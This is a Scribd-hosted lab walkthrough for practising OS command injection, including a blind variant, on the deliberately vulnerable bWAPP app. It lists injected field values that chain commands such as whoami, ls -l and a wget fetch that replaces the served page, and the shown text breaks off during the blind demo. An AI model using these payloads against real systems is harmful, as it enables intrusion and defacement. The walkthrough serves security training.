[go: up one dir, main page]
Scribd
Upload
743 views8 pages

OS Command Injection Bee-Box

Uploaded by

Binayak Prasad Gupta
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
743 views8 pages

OS Command Injection Bee-Box

Uploaded by

Binayak Prasad Gupta
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

OS Command Injection

Virtual machines needed:

● Bee-Box Machine

● Kali Linux virtual machine.

Demo 1: OS Command Injection.

Procedure:

1. Switch on both the virtual machines.


2. Now open a terminal in bee-box machine and use command: “ip a” to get the ip address
of the machine.

3. Now open the kali-linux machine and open a browser and type “http://192.168.1.5/” then
you will see the bWAPP website appearing.

4. Now click on “bWAPP” to move inside the main website.


5. Now you see the “bWAPP” webpage appearing as shown in the screenshot. Now use
username as “bee” and password as “bug”. Then click on Login.

6. Now select “OS Command Injection” from the drop-down menu as shown in the
screenshot. Then click on “Hack”.

7. Then you will see the following page appears as shown in the screenshot.
8. Now in place of “DNS Lookup” type “yahoo.com” then click on Lookup. Here you will get
all the information related to the searched DNS.

9. Now in place of DNS Lookup area type “yahoo.com|time”. Then hit lookup if the
command runs then we can say that the server has OS Command injection vulnerability.

10. Now again use command: “yahoo.com&&time”. Then you will see the following reply
appear.

11. Now change the security level to medium as shown in the screenshot.
12. Now use command: “yahoo.com | whoami”. This command will first perform a DNS
lookup for the domain "yahoo.com" using the nslookup command and then pipe the
output to the whoami command, which will simply return the username of the current
user executing the command.

13. Now use command: “yahoo.com && whoami”. So, if you type “yahoo.com && whoami”, it
will first perform the dns lookup of yahoo.com, and if that command succeeds, it will then
display the username using “whoami” command.
14. Now in DNS Lookup field use command: “www.yahoo.com ; wget http://example.com >>
script.html“. Then click on lookup.

15. Then you will see the following output appears

16. Now use “;” and type command “ls -l” to view the files present. Then click on “Lookup”

17. Then it shows the following output


18. Now press “CTRL + F” then search for “script.html” to check whether the creation was
successful or not.

19. Now hit enter to search. Then you will see the file present.

20. Now open a browser in your computer and search for “http://192.168.1.5” then you will
see the “example.com” webpage appearing instead of bee-box website.
Demo 2: OS Command Injection [Blind]

Procedure:

1. Switch on both the virtual machines.


2. Now open a terminal in bee-box machine and use command: “ip a” to get the ip address
of the machine.

3. Now open the kali-linux machine and open a browser and type “http://192.168.1.5/” then
you will see the bWAPP website appearing.

4. Now click on “bWAPP” to move inside the main website.


5. Now you see the “bWAPP” webpage appearing as shown in the screenshot. Now use
username as “bee” and password as “bug”. Then click on Login.

1. Now select “OS Command Injection Blind” from the drop-down menu as shown in the
screenshot. Then click on “Hack”.

2. Then you will see the following page appears as shown in the screenshot.
3. Now in IP address field type command: “120.0.0.5” and click on “Ping”. Now you will see a
message appear but no results appear.

4. Now use command: “120.0.0.5 ; cd > injection.txt “. This command copies the value
returned into a specified text file.

You might also like